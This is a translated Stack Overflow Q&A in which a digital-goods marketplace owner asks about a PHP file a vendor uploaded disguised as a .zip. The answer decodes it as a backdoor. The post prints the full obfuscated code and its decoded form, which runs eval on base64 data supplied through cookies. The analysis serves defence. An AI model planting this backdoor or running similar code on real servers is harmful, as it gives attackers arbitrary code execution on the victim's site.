有没有人见过像这样混淆的代码？这是什么意思？

Question

有没有人见过像这样混淆的代码？这是什么意思？

3

我拥有一个数字商品交易市场，有一个供应商上传了这个文件，它是一个zip文件，但在Windows上显示为损坏的。当我在Linux中打开它时，我震惊地发现这个文件本身是一个php文件，有人添加了.zip扩展名。

有人见过这样的代码吗？谁能帮我理解它？它是否恶意？

<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","wswtwrw_wrwepwlwacwe");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "bibabisbie64bi_dbiebicbiobidbie");
$iign = $cyvj("x","","xcxrxexaxtxex_funxctixon");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>

这是我从中提取到的内容。

<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","str_replace");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "base64_decode");
$iign = $cyvj("x","","create_function");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>

$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))

$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}

- Robert McDermott

1个回答

网页内容由stack overflow 提供, 点击上面的

可以查看英文原文，
原文链接

- Schiem · Accepted Answer

简而言之，这段代码允许他人使用cookie在你的服务器上执行任意脚本。

这段代码使用一堆随机的base64字符串创建一个函数，然后立即执行它。我花了点时间对函数进行反混淆，得到以下内容：

if($_COOKIE[0] =='ma' && count($_COOKIE)>3){
    echo '<serati>';
    eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
    echo '</serati>';}

重要的一行是这句话：

eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));

让我们分解成几个部分：

join(array_slice($_COOKIE,count($_COOKIE)-3))

这段代码将$_COOKIE数组中从count($_COOKIE) - 3开始的所有项连接在一起，直到数组结尾（使它们成为一个字符串）。

preg_replace(array('/[^\w=\s]'','/\s/'), array('','+')

首先，这会搜索新创建的字符串以查找模式“example ='”（其中example可以是任何单词），并用空替换它。因此，如果字符串为：

test= 'blah' 它将被替换为 blah'。

这还将所有空格替换为+。

eval(base64_decode(..));

这将刚刚创建的字符串（可能是base64编码的）解码为人类可读格式。然后，它将该字符串在服务器上执行。

基本上，这意味着某人可以在其计算机上创建一些base64格式的cookie，您的服务器将它们合并成一个长字符串，对其进行解码并在服务器上执行。